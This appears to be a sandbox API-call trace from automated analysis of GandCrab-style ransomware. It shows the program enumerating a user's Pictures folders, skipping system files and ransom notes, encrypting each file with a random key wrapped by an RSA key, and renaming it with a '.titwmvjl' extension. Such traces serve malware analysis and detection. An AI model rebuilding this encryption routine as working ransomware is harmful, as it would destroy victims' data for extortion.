VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.820] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.821] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.821] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.821] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.821] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0094.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.821] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.821] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.822] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.822] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5037f8) returned 1 [0094.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.822] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.822] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.823] GetLastError () returned 0x0 [0094.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.823] CryptDestroyKey (hKey=0x5037f8) returned 1 [0094.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.823] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.823] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.824] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503378) returned 1 [0094.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.824] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.824] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.824] GetLastError () returned 0x0 [0094.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.824] CryptDestroyKey (hKey=0x503378) returned 1 [0094.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.824] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.825] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.825] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.825] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0xa25, lpOverlapped=0x0) returned 1 [0094.836] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffff5db, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.836] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa25, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0xa25, lpOverlapped=0x0) returned 1 [0094.838] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.838] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0094.839] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.842] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.843] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.843] CloseHandle (hObject=0x2bc) returned 1 [0094.843] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\rb7m3fflims_mi8u6mp.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\rB7m3FfliMS_mI8U6Mp.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\rb7m3fflims_mi8u6mp.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.844] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.844] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.844] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.844] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.844] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\TITWMVJL-DECRYPT.txt" [0094.844] lstrlenW (lpString=".titwmvjl") returned 9 [0094.844] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\TITWMVJL-DECRYPT.txt") returned 69 [0094.844] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.845] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 78 [0094.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\TITWMVJL-DECRYPT.txt") returned 69 [0094.845] lstrlenW (lpString=".txt") returned 4 [0094.845] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.845] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.845] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.845] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\TITWMVJL-DECRYPT.txt") returned 69 [0094.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\TITWMVJL-DECRYPT.txt") returned 69 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.845] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.845] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.846] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.846] lstrcmpW (lpString1="_4Hkn.gif", lpString2=".") returned 1 [0094.846] lstrcmpW (lpString1="_4Hkn.gif", lpString2="..") returned 1 [0094.846] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="_4Hkn.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif" [0094.846] lstrlenW (lpString=".titwmvjl") returned 9 [0094.846] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif") returned 58 [0094.846] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.846] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif.titwmvjl") returned 67 [0094.846] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif") returned 58 [0094.846] lstrlenW (lpString=".gif") returned 4 [0094.846] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.846] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.846] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.846] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.846] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif") returned 58 [0094.846] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif") returned 58 [0094.846] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="desktop.ini") returned -1 [0094.846] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="autorun.inf") returned -1 [0094.846] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="ntuser.dat") returned -1 [0094.846] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="iconcache.db") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="bootsect.bak") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="boot.ini") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="ntuser.dat.log") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="thumbs.db") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="CRAB-DECRYPT.html") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="ntldr") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="NTDETECT.COM") returned -1 [0094.847] lstrcmpiW (lpString1="_4Hkn.gif", lpString2="Bootfont.bin") returned -1 [0094.847] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif") returned 58 [0094.847] lstrlenW (lpString=".gif") returned 4 [0094.847] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.847] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.847] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.847] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.847] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\_4hkn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0094.848] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.848] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0094.848] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.849] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.849] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.849] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.849] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.849] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.849] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0094.850] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.850] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.850] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.850] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.850] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0094.850] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.851] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.851] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.851] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0094.851] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.851] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.851] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.851] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.851] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.852] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5033b8) returned 1 [0094.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.852] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.852] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.852] GetLastError () returned 0x0 [0094.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.852] CryptDestroyKey (hKey=0x5033b8) returned 1 [0094.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.853] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.853] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0094.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.853] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5033f8) returned 1 [0094.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.853] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0094.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.854] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0094.854] GetLastError () returned 0x0 [0094.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.854] CryptDestroyKey (hKey=0x5033f8) returned 1 [0094.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.854] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.854] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.854] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.855] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0xa491, lpOverlapped=0x0) returned 1 [0094.867] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xffff5b6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.867] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa491, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0xa491, lpOverlapped=0x0) returned 1 [0094.868] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.868] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0094.869] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.873] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.873] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.873] CloseHandle (hObject=0x2bc) returned 1 [0094.874] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\_4hkn.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\_4Hkn.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\_4hkn.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.875] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.875] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0094.875] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0094.876] CloseHandle (hObject=0x2b4) returned 1 [0094.876] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0094.876] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.876] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.876] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\TITWMVJL-DECRYPT.txt" [0094.876] lstrlenW (lpString=".titwmvjl") returned 9 [0094.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\TITWMVJL-DECRYPT.txt") returned 56 [0094.876] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.876] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 65 [0094.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\TITWMVJL-DECRYPT.txt") returned 56 [0094.876] lstrlenW (lpString=".txt") returned 4 [0094.876] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.876] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.877] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.877] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.877] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\TITWMVJL-DECRYPT.txt") returned 56 [0094.877] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\TITWMVJL-DECRYPT.txt") returned 56 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.877] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.877] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.877] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0094.877] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0094.878] CloseHandle (hObject=0x2ac) returned 1 [0094.878] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0094.878] lstrcmpW (lpString1="y1mF", lpString2=".") returned 1 [0094.878] lstrcmpW (lpString1="y1mF", lpString2="..") returned 1 [0094.878] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="y1mF" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF" [0094.878] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\y1mF\\" [0094.878] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.879] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.879] VirtualAlloc (lpAddress=0x0, dwSize=0x400, 